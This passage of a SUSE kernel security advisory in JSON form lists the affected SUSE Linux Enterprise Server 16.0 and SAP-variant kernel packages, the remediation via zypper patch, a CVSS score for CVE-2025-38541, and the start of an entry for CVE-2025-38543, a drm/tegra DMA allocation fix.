"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38541",
"url": "https://www.suse.com/security/cve/CVE-2025-38541"
},
{
"category": "external",
"summary": "SUSE Bug 1248216 for CVE-2025-38541",
"url": "https://bugzilla.suse.com/1248216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38541"
},
{
"cve": "CVE-2025-38543",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38543"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tegra: nvdec: Fix dma_alloc_coherent error check\n\nCheck for NULL return value with dma_alloc_coherent, in line with\nRobin\u0027s fix for vic.c in \u0027drm/tegra: vic: Fix DMA API misuse\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
